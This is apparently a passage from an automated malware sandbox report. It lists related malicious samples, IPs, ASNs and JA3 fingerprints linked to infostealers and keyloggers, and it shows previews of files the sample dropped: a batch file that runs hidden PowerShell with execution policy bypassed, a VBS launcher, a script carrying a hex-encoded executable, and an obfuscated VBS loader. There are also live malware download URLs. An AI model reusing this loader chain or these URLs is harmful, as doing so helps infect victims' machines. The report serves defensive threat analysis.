                                                                                                                          vVVLp9JVxK.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                          • 185.166.143.48
                                                                                                                          company profile and iems .vbsGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          https://bitbucket.org/socialinformationonline/love/downloads/Statement-963462.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          https://bitbucket.org/thanksforusingourwebsite/serv/downloads/Statement-415322025.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          • 185.166.143.50
                                                                                                                          5% discount products.vbsGet hashmaliciousFormBookBrowse
                                                                                                                          • 185.166.143.48
                                                                                                                          https://bitbucket.org/thanksforusingourwebsite/serv/downloads/248364651.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          • 185.166.143.48
                                                                                                                          Purchase order.vbsGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          asegurar.vbsGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.166.143.48
                                                                                                                          segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.166.143.48
                                                                                                                          free.cdn.hstgr.nethttps://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.121
                                                                                                                          http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.104
                                                                                                                          https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.197
                                                                                                                          http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.227
                                                                                                                          https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                                                                                          • 93.127.179.137
                                                                                                                          e0OOofAl0S.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                                                                          • 191.96.144.157
                                                                                                                          oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                                                                          • 84.32.84.152
                                                                                                                          mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                                                                          • 185.77.97.68
                                                                                                                          V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                                                                                          • 84.32.84.249
                                                                                                                          h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                                                                                                          • 84.32.84.88
                                                                                                                          api.ipify.orgIF787e5nei.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                          • 172.67.74.152
                                                                                                                          3Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          6ehOuQ8ifL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          JkYvyHHOr8.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          y4jxkrdxZr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          https://averellharriman.sharefile.com/public/share/web-sab7e0a816d3e4e0ca3a0899254901a6dGet hashmaliciousUnknownBrowse
                                                                                                                          • 172.67.74.152
                                                                                                                          s-part-0017.t-0009.fb-t-msedge.netShipping Documents.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          New_Order_#070824_Order_September-2024_pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          NVWLJmqmzn.dllGet hashmaliciousStrela StealerBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          2CUvvDyapb.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          SecuriteInfo.com.Trojan.DownLoader47.49096.30794.15745.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          Noncapture19.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          http://txwk.10010.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.253.45
                                                                                                                          Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.253.45

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          TELEGRAMRU05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          CLOUDFLARENETUSAviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 104.17.25.14
                                                                                                                          https://prezi.com/i/amopqalyrbyv/Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.94.41
                                                                                                                          https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          https://link.edgepilot.com/s/c156b169/ta1tculxp0_Kfe6FelE-EQ?u=https://links.milanote.com/uni/ls/click?upn=u001.qLX9yCzR-2FsrNCveODBYktWd2QtsYHwBxjMjZ1TpW-2F9ng461Vm3c5YVgExxI2qEfF60jol-2FeLhYaPK8GlBsUmEiH9efaYObnhs06BMhy-2BnV9K-2FT1g-2BgCKMoIt-2BOsQ5x4z-2B0jd2R9B6J6Sadj8ZwA99g-3D-3DzV7f_2FnvF7-2FWwP6dBMnZiJJg-2FVZ56wbflsjFmFKzNzxB08Wj-2Fx2CttPGn-2F5h8MyFIcdJ3ODQy7fgm-2Fr3OjYMY9in5osqXoDc6reOgljtfQ-2FAwX1sLvCIeep1RzAkMPXrYr3uVmoIw8PZdhvqLCdI70jOD-2FqfGw6aAi7pSSe7-2BoWoH3-2Bab0SJ6OHapEhzeh0Nb40hwQ5bj2ouQCGYGMQbw31NR2JjDQjIBAubwgu2SXWETns-3DGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.86.42
                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          AMAZON-02USShipping Documents.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.66.50.104
                                                                                                                          Shipping Documents.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 52.64.196.83
                                                                                                                          https://prezi.com/i/amopqalyrbyv/Get hashmaliciousUnknownBrowse
                                                                                                                          • 18.239.94.33
                                                                                                                          Shipping Documents.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.66.50.104
                                                                                                                          Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                          • 54.66.50.104
                                                                                                                          https://link.edgepilot.com/s/c156b169/ta1tculxp0_Kfe6FelE-EQ?u=https://links.milanote.com/uni/ls/click?upn=u001.qLX9yCzR-2FsrNCveODBYktWd2QtsYHwBxjMjZ1TpW-2F9ng461Vm3c5YVgExxI2qEfF60jol-2FeLhYaPK8GlBsUmEiH9efaYObnhs06BMhy-2BnV9K-2FT1g-2BgCKMoIt-2BOsQ5x4z-2B0jd2R9B6J6Sadj8ZwA99g-3D-3DzV7f_2FnvF7-2FWwP6dBMnZiJJg-2FVZ56wbflsjFmFKzNzxB08Wj-2Fx2CttPGn-2F5h8MyFIcdJ3ODQy7fgm-2Fr3OjYMY9in5osqXoDc6reOgljtfQ-2FAwX1sLvCIeep1RzAkMPXrYr3uVmoIw8PZdhvqLCdI70jOD-2FqfGw6aAi7pSSe7-2BoWoH3-2Bab0SJ6OHapEhzeh0Nb40hwQ5bj2ouQCGYGMQbw31NR2JjDQjIBAubwgu2SXWETns-3DGet hashmaliciousUnknownBrowse
                                                                                                                          • 18.245.46.10
                                                                                                                          Payment Advice-RefA22D4YdWsbE56.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                          • 3.25.29.225
                                                                                                                          https://sendspace.com/pro/z42su8Get hashmaliciousMamba2FABrowse
                                                                                                                          • 18.245.31.33
                                                                                                                          Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                          • 13.33.187.96
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 18.244.18.38
                                                                                                                          NTT-LT-ASLTicRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.121
                                                                                                                          wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          09Iz0ja549.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          http://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.208

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0emeN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          rA01_278 Check list#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          http://go.wafykoe.com/0nbeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          https://www.google.com/url?q=https://alhmusa.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdIUkpVa009JnVpZD1VU0VSMTUxMDIwMjRVMDExMDE1NDE%3D&sa=D&source=editors&ust=1730911677097978&usg=AOvVaw0lzPnbpui3_6j_tDBkURnOGet hashmaliciousUnknownBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          wecreatdbestthingswithgreatthingsentiretimeeverywheregoodhappy.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          • 104.26.12.205
                                                                                                                          • 84.32.84.136
                                                                                                                          37f463bf4616ecd445d4a1937da06e19rA01_278 Check list#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          VZ7xFmeuPX.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          p7cCXP3hDz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          fIwP4c7xYt.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 185.166.143.49
                                                                                                                          6b94X7dMrG.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 185.166.143.49

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\Public\Documents\Visuals\VcEffect.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:DOS batch file, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):147
                                                                                                                          Entropy (8bit):4.228342172833688
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:mKDDNF/+IzKdSNAJJFILuTNAy+CFdZkREFCl+gQHQeD11X:hBEUns86WCF8Dk1D3
                                                                                                                          MD5:5D441F6A5341B7899BE82D634BFA1158
                                                                                                                          SHA1:C9B082DE1D6677684BBD20BDC10F099568403588
                                                                                                                          SHA-256:47025C3031C3AE937202CA8F9E7C47666355505E1B4A6F76E0BB5988DA54321D
                                                                                                                          SHA-512:954A023B359114548CF162A6F381649B9656ED2C7089E414DF14CECE044C2E90AA2C5F7D5DEC2AE3B8AEB0E93C5999EDDA5FDD091847CF957F776CD166F708EF
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:@echo off .cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"

                                                                                                                          C:\Users\Public\Documents\Visuals\VcTurn.vbs

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):174
                                                                                                                          Entropy (8bit):4.891339875717463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:9cNAWdgUdgQbKF/FZA+h/FAJ3Em8nm//8H8XZkREFCl+gQHGDYjLA71RPRA:9cNAWdgUvKXZRXo3NqW/W8GDkUT5RPRA
                                                                                                                          MD5:3E91C0BBB5A3148B51E1CF45CBF90334
                                                                                                                          SHA1:7D8E822DFD8A26B70EF1E6CAAA5375BBBCD8D8B6
                                                                                                                          SHA-256:EB878D6CD39DECFAF050DC4D68F713D23F9EC236298652FC49B8DAED43DBCAC2
                                                                                                                          SHA-512:03397B12AEF4C1B9D44123C43A554092E3F5B17F5399C01BEDE1A6068F7F661A12C1BC67DC15CD4FB3C1ED6619D50DBEBCD396999A6042E744DCAE55167EBF76
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:On Error Resume Next..Sub zjte. Dim sbyjn. Set sbyjn = CreateObject("WScript.Shell"). sbyjn.Run "C:\ProgramData\Documents\Visuals\VcEffect.bat", 0, True.End Sub.zjte

                                                                                                                          C:\Users\Public\Documents\Visuals\VcTurnOff.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with very long lines (65529)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):679952
                                                                                                                          Entropy (8bit):2.6864053565409627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:Cq8DPOMMSys0ln+24fx+VvlvSdRYXNZv/N3Jnv3t/VsMBnvq4Em0IbXobWXaG+QX:3
                                                                                                                          MD5:904D72EBD5D5767670A0E8C3ED002056
                                                                                                                          SHA1:7B0891093DBABBA268CD917BED22BB6AD706EAAF
                                                                                                                          SHA-256:C4B290ED3CEB7F7AC909BA7BA7C12D2D909441271CC54AC8F2CDAE0A1A2F503B
                                                                                                                          SHA-512:74DD0483ADCBA02ADB1108E5CF46D34F253F23AAD50DBF2F48EF8A54B2DF4AA53F5310244BE007354235496B6137A8031355C7D19CE6C04F11275C8771FE2210
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:try.{..$cake = "4D##&&5A##&&90##&&00##&&03##&&00##&&00##&&00##&&04##&&00##&&00##&&00##&&FF##&&FF##&&00##&&00##&&B8##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&40##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&80##&&00##&&00##&&00##&&0E##&&1F##&&BA##&&0E##&&00##&&B4##&&09##&&CD##&&21##&&B8##&&01##&&4C##&&CD##&&21##&&54##&&68##&&69##&&73##&&20##&&70##&&72##&&6F##&&67##&&72##&&61##&&6D##&&20##&&63##&&61##&&6E##&&6E##&&6F##&&74##&&20##&&62##&&65##&&20##&&72##&&75##&&6E##&&20##&&69##&&6E##&&20##&&44##&&4F##&&53##&&20##&&6D##&&6F##&&64##&&65##&&2E##&&0D##&&0D##&&0A##&&24##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&50##&&45##&&00##&&00##&&4C##&&01##&&03##&&00##&&AA##&&AE##&&07##&&67##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&E0##&&00##&&02##&&01##&&0B##&&01##&&0B##&&00##&&00##&&86##&&00##&&00##&&00##&&08##&&00##&&00##&&

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\010[1].txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                          File Type:ASCII text, with very long lines (21405)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):45520
                                                                                                                          Entropy (8bit):2.279898802964528
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:VXCloZawioqclsC2FhY4ClomWTeCOZOLZOFfClodawaoqJlyCZFMYaWkeC8ZOhE/:VXCloZawioqclsC2FhY4ClomWTeCOZOD
                                                                                                                          MD5:3D6908062CADD94F0B791E0BAD56A2ED
                                                                                                                          SHA1:18608D9788861FFE0CFC3251E08397646F870B7A
                                                                                                                          SHA-256:948B30801AD10974098086692FEC191DDAD84769FD67EEBC5C0CE1259ADFD1A3
                                                                                                                          SHA-512:203DA9B75650AD3ACA72FD65D90BDA46026EF87F23B3C8BE748B3995CEE6141B9B124BE69A09932A46AEEC6ACB5D5A2E93EE39B326F1EA06BC6D4D2F69EFD67B
                                                                                                                          Malicious:false
                                                                                                                          Preview:Dim sdbszddunfrlwypavcup.sdbszddunfrlwypavcup = "D&-----&i____%____&-----&m____%____ &-----&j____%____&-----&l____%____&-----&j____%____&-----&d____%____&-----&m____%____&-----&e____%____&-----&w____%____&-----&o____%____&-----&r____%____&-----&g____%____&-----&a____%____&-----&f____%____&-----&n____%____yv&-----&f____%____&-----&e____%____&-----&i____%____&-----&u____%____&-----&s____%____" & _.vbCrLf & "&-----&j____%____&-----&l____%____&-----&j____%____&-----&d____%____&-----&m____%____&-----&e____%____&-----&w____%____&-----&o____%____&-----&r____%____&-----&g____%____&-----&a____%____&-----&f____%____&-----&n____%____yv&-----&f____%____&-----&e____%____&-----&i____%____&-----&u____%____&-----&s____%____ = &-----&""____%____O&-----&&-----&n____%________%____ E&-----&&-----&r____%________%____&-----&&-----&r____%________%____&-----&&-----&o____%________%____&-----&&-----&r____%________%____ R&-----&&-----&e____%________%____&-----&&-----&s____%________%____&-----&&-----&u____%______

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11608
                                                                                                                          Entropy (8bit):4.890472898059848
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                          Malicious:false
                                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):1.1510207563435464
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlllull/L:NllUl
                                                                                                                          MD5:BDA4B916D480DAA12470D0756AE20FC4
                                                                                                                          SHA1:1E9D83C18AD1F5CB0A6779F83C589BC5FAAF7F90
                                                                                                                          SHA-256:57867A26FBECD1C4D04079E19D5837E80E986BB1FA7CD0176C02524D33380FE6
                                                                                                                          SHA-512:CC7BFEB981BB67442D54D49B6E90F304F326583D1ACF305F17212D3D88BFA098FFA1633BC747443D48CE103993EED0B4A4C965FC4CD1847462D0881068306A5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...............................g................@..........

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1v3hd1oc.roz.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f2xzy5m.ikf.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpi5dqsm.zfp.psm1

                                                                                                                          Download File
